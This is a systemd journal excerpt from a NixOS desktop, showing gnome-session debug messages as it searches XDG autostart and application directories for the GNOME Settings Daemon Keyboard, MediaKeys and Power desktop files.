machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Keyboard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.MediaKeys.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Keyboard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.MediaKeys.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.MediaKeys.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Power.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.MediaKeys.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Power.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
